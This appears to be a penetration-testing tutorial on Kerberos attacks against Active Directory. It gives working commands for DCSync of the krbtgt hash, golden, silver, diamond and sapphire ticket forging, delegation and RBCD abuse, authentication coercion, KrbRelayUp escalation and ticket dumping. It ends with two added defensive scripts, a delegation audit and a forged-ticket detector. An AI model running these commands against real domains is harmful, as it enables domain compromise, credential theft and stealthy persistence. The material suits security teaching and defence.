Kerberos Attacks

Golden ticket, silver ticket, diamond ticket, sapphire ticket, delegation abuse, S4U, ticket forging, and Kerberos relay. Covers exploitation from both Linux and Windows.


You have compromised credentials, hashes, or keys and want to abuse Kerberos for privilege escalation, persistence, or lateral movement. Kerberos is the default authentication protocol in AD, and its trust model creates powerful attack opportunities when you control the right secrets.


Kerberos Key Material Reference

Different attacks require different key material. Know what you need before you start.

| Material | Where to Get It | Used For |
|---|---|---|
| krbtgt NTLM hash | DCSync, NTDS.dit | Golden Ticket |
| krbtgt AES256 key | DCSync, NTDS.dit | Diamond Ticket, Golden Ticket (stealth) |
| Service account NTLM hash | Kerberoasting, DCSync, LSASS | Silver Ticket |
| Service account AES256 key | DCSync, LSASS | Silver Ticket (stealth) |
| Machine account hash | LSASS, secretsdump | Silver Ticket, S4U |
| User TGT | LSASS, Rubeus, getTGT | Pass-the-Ticket, S4U |
| Domain SID | whoami /all, PowerView, lookupsid | All ticket forging |

Golden Ticket

A Golden Ticket is a forged TGT signed with the krbtgt hash. Since every DC uses the krbtgt key to validate TGTs, a Golden Ticket gives you access as any user (including non-existent users) for as long as the krbtgt password is not rotated twice.

Get the krbtgt Hash

```bash
# DCSync the krbtgt account
impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc-user krbtgt

# Note the NTLM hash and AES256 key from the output
```

Forge the Golden Ticket

```bash
# Impacket ticketer
impacket-ticketer -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache

# Use the ticket
impacket-psexec corp.local/Administrator@dc01.corp.local -k -no-pass

# With AES256 key (stealthier)
impacket-ticketer -aesKey 4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local Administrator
```

Golden Tickets bypass all password changes except krbtgt rotation. To invalidate Golden Tickets, the krbtgt password must be reset twice (because AD keeps the current and previous password). A single reset still leaves the old key valid.

Silver Ticket

A Silver Ticket is a forged TGS for a specific service. It is signed with the service account’s hash (or the machine account hash for services running as SYSTEM). The DC is never contacted, so Silver Tickets bypass most logging.

Forge a Silver Ticket

```bash
# Silver Ticket for CIFS (file shares) on ws01
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn cifs/ws01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-smbclient corp.local/Administrator@ws01.corp.local -k -no-pass

# Silver Ticket for HTTP (WinRM) on dc01
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn http/dc01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.corp.local -r corp.local

# Silver Ticket for LDAP on dc01 (enables DCSync)
impacket-ticketer -nthash a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain corp.local -spn ldap/dc01.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc
```

Common SPN Targets for Silver Tickets

| SPN | Service | What You Can Do |
|---|---|---|
| cifs/host | SMB | Access file shares, PsExec |
| host/host | HOST | Create services, scheduled tasks, WMI |
| http/host | WinRM | PowerShell Remoting |
| ldap/dc | LDAP | DCSync, LDAP queries |
| mssql/host | MSSQL | Database access |
| wsman/host | WinRM | Same as HTTP |

Silver Tickets are stealthier than Golden Tickets because they never touch the DC. The TGS is validated locally by the target service. The downside is that they only work for the specific service and host you forged them for.

Diamond Ticket

A Diamond Ticket is a legitimate TGT requested from the DC, then modified (the PAC is decrypted with the krbtgt key, changed, and re-encrypted). Because the TGT was originally issued by the DC, it has valid metadata and is much harder to detect than a Golden Ticket.

```powershell
# Rubeus diamond ticket
PS C:\> .\Rubeus.exe diamond /krbkey:4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 /user:svc_backup /password:P@ssw0rd123 /enctype:aes /ticketuser:Administrator /domain:corp.local /dc:dc01.corp.local /ptt
```

Diamond Tickets require the krbtgt AES key and a valid domain account. The legitimate TGT request generates a normal AS-REQ/AS-REP exchange on the DC, making the initial request indistinguishable from normal traffic.

Sapphire Ticket

A Sapphire Ticket takes the Diamond Ticket concept further. Instead of modifying the PAC in a legitimate TGT, it requests a TGT, then uses S4U2Self to get a service ticket for a high-privileged user and transplants that PAC into the original TGT. The PAC is completely legitimate, not forged.

```powershell
# Rubeus sapphire ticket
PS C:\> .\Rubeus.exe diamond /krbkey:4a3f2b1c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 /user:svc_backup /password:P@ssw0rd123 /enctype:aes /ticketuser:Administrator /domain:corp.local /dc:dc01.corp.local /ptt /tgtdeleg
```

Sapphire Tickets are the most OPSEC-safe ticket forging technique. The PAC is legitimate (obtained via S4U2Self from a real DC), and the TGT was legitimately requested. Detection requires deep Kerberos traffic analysis.

Delegation Abuse

Delegation allows services to act on behalf of users. Misconfigured delegation is one of the most common privilege escalation paths in AD.

Unconstrained Delegation

Machines with unconstrained delegation store the TGT of every user that authenticates to them. Compromise the machine, extract the TGTs, and impersonate those users.

```bash
# Find unconstrained delegation hosts (excluding DCs)
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
  -b "DC=corp,DC=local" "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(primaryGroupID=516)))" cn dNSHostName
```

```powershell
# Monitor for incoming TGTs with Rubeus
PS C:\> .\Rubeus.exe monitor /interval:5 /nowrap

# Coerce DC authentication (PrinterBug)
PS C:\> .\SpoolSample.exe dc01.corp.local ws01.corp.local

# Extract the DC machine TGT from Rubeus output and inject it
PS C:\> .\Rubeus.exe ptt /ticket:doIFNjCCBTKgAwIB...

# DCSync with the DC's TGT
PS C:\> .\mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" "exit"
```

```bash
# Coerce from Linux (PetitPotam)
root@localhost:~# python3 PetitPotam.py ws01.corp.local dc01.corp.local

# Or PrinterBug
root@localhost:~# python3 printerbug.py corp.local/svc_backup:'P@ssw0rd123'@dc01.corp.local ws01.corp.local
```

Constrained Delegation (S4U)

Accounts with constrained delegation can impersonate any user to the services listed in msDS-AllowedToDelegateTo. If protocol transition is enabled (T2A4D), no user interaction is needed.

```bash
# Find constrained delegation
impacket-findDelegation corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# S4U2Self + S4U2Proxy (impersonate Administrator to target service)
impacket-getST corp.local/svc_sql:'P@ssw0rd123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache
impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-pass

# S4U with hash
impacket-getST corp.local/svc_sql -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35

# Alternative SPN (service name is ignored in some cases)
impacket-getST corp.local/svc_sql:'P@ssw0rd123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35 -altservice ldap/dc01.corp.local
```

The /altservice flag (Rubeus) or -altservice (Impacket) rewrites the SPN in the resulting ticket. The DC only validates the target host, not the service name. You can request a ticket for cifs/ws01 and change it to ldap/ws01 or host/ws01.

Resource-Based Constrained Delegation (RBCD)

RBCD is configured on the target, not the source. If you can write to msDS-AllowedToActOnBehalfOfOtherIdentity on a computer object, you can configure it to allow a machine account you control to impersonate any user to that target.

1. Add a Computer Account: if ms-DS-MachineAccountQuota > 0, add a computer with impacket-addcomputer or PowerMad.
2. Set RBCD: write your new computer's SID to msDS-AllowedToActOnBehalfOfOtherIdentity on the target.
3. S4U2Self + S4U2Proxy: use your computer account to perform S4U and get a ticket as Administrator to the target.
4. Access the Target: use the resulting ticket for PsExec, SMB, WinRM, or any other service on the target.

```bash
# Step 1: Add a computer account
root@localhost:~# impacket-addcomputer corp.local/svc_backup:'P@ssw0rd123' -computer-name 'EVILPC$' -computer-pass 'Password123' -dc-ip 10.10.11.35

# Step 2: Set RBCD on the target
root@localhost:~# impacket-rbcd corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -action write -delegate-from 'EVILPC$' -delegate-to 'ws01$'

# Step 3: S4U to get a ticket as Administrator
root@localhost:~# impacket-getST corp.local/'EVILPC$':'Password123' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache

# Step 4: Access the target
root@localhost:~# impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-pass

# Cleanup: remove RBCD config
root@localhost:~# impacket-rbcd corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -action flush -delegate-to 'ws01$'
```
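The three delegation types above (unconstrained, constrained with or without protocol transition, and RBCD) all reduce to a handful of LDAP attributes and userAccountControl bits, which makes them easy to audit. The following Python script is an added example, not code from the original page or from any of the tools it mentions; it classifies constructed LDAP-style records the way a defender reviewing delegation would. It also generalises the altservice point from the constrained delegation section: because the service class in a delegated ticket can be rewritten, delegation to any SPN on a host is rated as delegation to every service on that host, and delegation that reaches a DC is rated higher. The sample objects, the DC host list, and the pre-parsed SID list standing in for msDS-AllowedToActOnBehalfOfOtherIdentity (which is really a binary security descriptor) are all assumptions; the attribute names and bit values are the real ones.

```python
"""Audit directory objects for the delegation misconfigurations described above.

Added example, not from the original page. The records are constructed to look
like LDAP search results; attribute names and userAccountControl bit values are
the real ones, the host names come from the page's lab domain.
"""
from __future__ import annotations
from dataclasses import dataclass

# userAccountControl flag bits (MS-ADTS)
UF_TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # 1048576: "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: protocol transition (T2A4D)
DC_PRIMARY_GROUP_ID = 516                      # members of Domain Controllers


@dataclass(frozen=True)
class Finding:
    account: str
    kind: str
    severity: str
    detail: str


def host_of(spn: str) -> str:
    """'MSSQLSvc/ws01.corp.local:1433' -> 'ws01.corp.local'."""
    return spn.split("/", 1)[1].split(":", 1)[0].lower()


def classify(obj: dict, dc_hosts: set[str]) -> list[Finding]:
    """Delegation findings for one LDAP-style record (dict of attribute -> value)."""
    sam = obj["sAMAccountName"]
    uac = int(obj.get("userAccountControl", 0))
    findings: list[Finding] = []

    # Unconstrained delegation anywhere but a DC: the host caches every caller's TGT.
    if (uac & UF_TRUSTED_FOR_DELEGATION) and int(obj.get("primaryGroupID", 0)) != DC_PRIMARY_GROUP_ID:
        findings.append(Finding(sam, "unconstrained", "high",
                                "caches the TGT of every principal that authenticates to it"))

    # Constrained delegation: rate by host, not service class, since the service
    # name in the delegated ticket can be rewritten (altservice); reaching a DC is worst.
    targets = obj.get("msDS-AllowedToDelegateTo", [])
    if targets:
        hosts = sorted({host_of(t) for t in targets})
        reaches_dc = any(h in dc_hosts for h in hosts)
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            kind, sev = "constrained+protocol-transition", "critical" if reaches_dc else "high"
            how = "can obtain a ticket as any non-protected user, without that user's involvement, to"
        else:
            kind, sev = "constrained", "high" if reaches_dc else "medium"
            how = "can forward the identity of users who authenticate to it to"
        findings.append(Finding(sam, kind, sev, f"{how} every service on {', '.join(hosts)}"))

    # RBCD: the attribute is a security descriptor; assumed here to be pre-parsed to SIDs.
    trusted = obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity", [])
    if trusted:
        findings.append(Finding(sam, "rbcd", "medium",
                                f"lets {', '.join(trusted)} impersonate users to it"))

    # Mitigation gap: privileged users (adminCount=1) should carry UF_NOT_DELEGATED
    # so that neither S4U nor an unconstrained host can act as them.
    if int(obj.get("adminCount", 0)) == 1 and not (uac & UF_NOT_DELEGATED):
        findings.append(Finding(sam, "delegatable-privileged-user", "medium",
                                "privileged account lacks 'sensitive and cannot be delegated'"))
    return findings


def audit(objects: list[dict], dc_hosts: set[str]) -> list[Finding]:
    return [f for obj in objects for f in classify(obj, dc_hosts)]


# Constructed sample directory (not real LDAP output); DC list is hypothetical.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 532480, "primaryGroupID": 516},
    {"sAMAccountName": "WS01$", "userAccountControl": 528384, "primaryGroupID": 515},
    {"sAMAccountName": "svc_sql", "userAccountControl": 16843264,
     "msDS-AllowedToDelegateTo": ["cifs/ws01.corp.local", "MSSQLSvc/ws01.corp.local:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 66048,
     "msDS-AllowedToDelegateTo": ["http/dc01.corp.local"]},
    {"sAMAccountName": "FS01$", "userAccountControl": 4096,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["S-1-5-21-3842939050-3880317879-2865463114-1108"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 66048, "adminCount": 1},
    {"sAMAccountName": "da_bob", "userAccountControl": 1114624, "adminCount": 1},
]
DC_HOSTS = {"dc01.corp.local"}

if __name__ == "__main__":
    for f in audit(SAMPLE_OBJECTS, DC_HOSTS):
        print(f"[{f.severity:>8}] {f.account:<14} {f.kind:<32} {f.detail}")
```

On real data the records come from an ldapsearch like the one in the unconstrained delegation section (requesting userAccountControl, primaryGroupID, adminCount, msDS-AllowedToDelegateTo and msDS-AllowedToActOnBehalfOfOtherIdentity) after decoding the RBCD security descriptor into SIDs. The DC01$ record shows why the unconstrained rule excludes primaryGroupID 516: DCs legitimately carry TRUSTED_FOR_DELEGATION, so the interesting hosts are the non-DC ones, and da_bob shows the fix for privileged users, the UF_NOT_DELEGATED bit that makes S4U2Self and TGT caching useless against that account.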

Kerberos Relay (KrbRelayUp)

KrbRelayUp abuses local Kerberos relay to escalate privileges on a domain-joined machine without needing any AD credentials. It relays the machine account’s Kerberos authentication to LDAP to set RBCD on itself.

```powershell
# KrbRelayUp - local privilege escalation via Kerberos relay
PS C:\> .\KrbRelayUp.exe relay -Domain corp.local -CreateNewComputerAccount -ComputerName EVILPC$ -ComputerPassword Password123

# After RBCD is set, use Rubeus S4U
PS C:\> .\Rubeus.exe s4u /user:EVILPC$ /rc4:<hash_of_Password123> /impersonateuser:Administrator /msdsspn:host/ws01.corp.local /ptt

# Then create a service or use SCM for SYSTEM shell
PS C:\> .\KrbRelayUp.exe spawn -d corp.local -cn EVILPC$ -cp Password123
```

KrbRelayUp requires that LDAP signing is not enforced on the DC and that the machine can relay its own Kerberos authentication. This is the default configuration in most environments.

Ticket Management

Listing and Purging Tickets

```powershell
# List current Kerberos tickets
PS C:\> klist

# Purge all tickets
PS C:\> klist purge

# Rubeus - list tickets in current session
PS C:\> .\Rubeus.exe triage

# Rubeus - dump all tickets from all sessions (requires SYSTEM)
PS C:\> .\Rubeus.exe dump /nowrap

# Rubeus - dump specific user's tickets
PS C:\> .\Rubeus.exe dump /user:Administrator /nowrap
```

Ticket Conversion

```bash
# Convert .kirbi (Windows) to .ccache (Linux)
root@localhost:~# impacket-ticketConverter ticket.kirbi ticket.ccache

# Convert .ccache to .kirbi
root@localhost:~# impacket-ticketConverter ticket.ccache ticket.kirbi
```

Requesting Tickets

```bash
# Request TGT with password
impacket-getTGT corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# Request TGT with NTLM hash
impacket-getTGT corp.local/svc_backup -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -dc-ip 10.10.11.35

# Request TGT with AES key
impacket-getTGT corp.local/svc_backup -aesKey 4a3f2b1c... -dc-ip 10.10.11.35

# Request a service ticket
impacket-getST corp.local/svc_backup:'P@ssw0rd123' -spn cifs/ws01.corp.local -dc-ip 10.10.11.35
```

Ticket Forging Detection Comparison

| Ticket Type | Requires | Touches DC | Detection Difficulty |
|---|---|---|---|
| Golden Ticket | krbtgt hash | Only on TGS-REQ | Medium (PAC anomalies, no AS-REQ) |
| Silver Ticket | Service account hash | Never | Low (no DC involvement) |
| Diamond Ticket | krbtgt AES key + valid account | AS-REQ + PAC modification | High (legitimate TGT base) |
| Sapphire Ticket | krbtgt AES key + valid account | AS-REQ + S4U2Self | Very High (legitimate PAC) |
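The "Touches DC" column is what a detection has to work with. The following Python correlation is an added example, not code from the page or from any of the tools it describes; it turns the Golden and Silver rows into concrete rules over Windows security events. A 4769 service-ticket request for an account that never received a 4768 TGT within the TGT lifetime, or for an account that does not exist in the directory, points at a Golden Ticket (a forged TGT is presented straight to the TGS step, so the DC never saw an AS-REQ); a Kerberos network logon (4624, logon type 3) on a host for which no DC ever issued a service ticket to that account points at a Silver Ticket (the forged TGS never went through the DC, so the only trace is on the target). The event records, the account list and the shortened field names are constructed; the event IDs and their meaning are the real ones. Diamond and Sapphire tickets start from a genuine AS-REQ and so pass both rules, which is why the table rates them hard to detect.

```python
"""Correlate DC and endpoint security events to surface forged-ticket use.

Added example, not from the original page. Event IDs are the real Windows
security events (4768 TGT issued, 4769 service ticket issued, 4624 logon);
the records below are constructed and use shortened field names.
"""
from __future__ import annotations
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # AD default maximum TGT lifetime


def service_host(service_name: str) -> str:
    """4769 'Service Name' is the service account, e.g. 'WS01$'; map it to the host name."""
    return service_name.rstrip("$").lower()


def detect(events: list[dict], known_accounts: set[str]) -> list[dict]:
    """Return alerts; `events` must include every DC's 4768/4769 plus endpoint 4624s."""
    known = {a.lower() for a in known_accounts}
    events = sorted(events, key=lambda e: e["time"])
    tgt_times: dict[str, list[datetime]] = {}              # account -> times a TGT was issued
    tgs_times: dict[tuple[str, str], list[datetime]] = {}  # (account, host) -> service tickets issued
    for e in events:
        t = datetime.fromisoformat(e["time"])
        acct = e["account"].lower()
        if e["id"] == 4768 and e.get("result") == "0x0":
            tgt_times.setdefault(acct, []).append(t)
        elif e["id"] == 4769:
            tgs_times.setdefault((acct, service_host(e["service"])), []).append(t)

    alerts: list[dict] = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        acct = e["account"].lower()
        if e["id"] == 4769:
            # Golden Ticket indicators: the TGT presented was never issued by a DC.
            if acct not in known:
                alerts.append({"rule": "golden-unknown-account", "account": e["account"],
                               "message": f"{e['time']} 4769 by {e['account']} (no such account) for {e['service']}"})
            elif not any(t - TGT_LIFETIME <= ti <= t for ti in tgt_times.get(acct, [])):
                alerts.append({"rule": "golden-no-as-req", "account": e["account"],
                               "message": f"{e['time']} 4769 by {e['account']} for {e['service']} "
                                          f"with no 4768 in the last {TGT_LIFETIME}"})
        elif e["id"] == 4624 and e.get("auth_package") == "Kerberos" and e.get("logon_type") == 3:
            # Silver Ticket indicator: Kerberos logon on a host the DC never issued a ticket for.
            key = (acct, e["host"].lower())
            if not any(ti <= t for ti in tgs_times.get(key, [])):
                alerts.append({"rule": "silver-no-tgs-req", "account": e["account"],
                               "message": f"{e['time']} Kerberos logon of {e['account']} on {e['host']} "
                                          f"with no 4769 for that host"})
    return alerts


# Constructed sample events (not real log output). alice is a normal user session.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "host": "DC01", "id": 4768, "account": "alice", "result": "0x0"},
    {"time": "2024-05-01T09:05:00", "host": "DC01", "id": 4769, "account": "alice", "service": "WS01$"},
    {"time": "2024-05-01T09:05:30", "host": "WS01", "id": 4624, "account": "alice",
     "auth_package": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T09:30:00", "host": "DC01", "id": 4769, "account": "Administrator", "service": "DC01$"},
    {"time": "2024-05-01T09:35:00", "host": "DC01", "id": 4769, "account": "ghost", "service": "DC01$"},
    {"time": "2024-05-01T10:00:00", "host": "WS01", "id": 4624, "account": "Administrator",
     "auth_package": "Kerberos", "logon_type": 3},
]
KNOWN_ACCOUNTS = {"alice", "Administrator", "svc_backup", "WS01$", "DC01$"}

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{a['rule']:<24} {a['message']}")
```

Two practical conditions follow from the rules themselves: the Golden rule only works when 4768 and 4769 are collected from every DC in the domain with a lookback of at least the maximum TGT lifetime (longer where renewed TGTs are common, or legitimate sessions will trip it), and the Silver rule only works with endpoint 4624 events, because nothing about a Silver Ticket is ever visible on the DC. The krbtgt rotation mitigation the Golden Ticket section mentions is the complement to this: after the double reset, every forged TGT fails at exactly the 4769 step these rules watch.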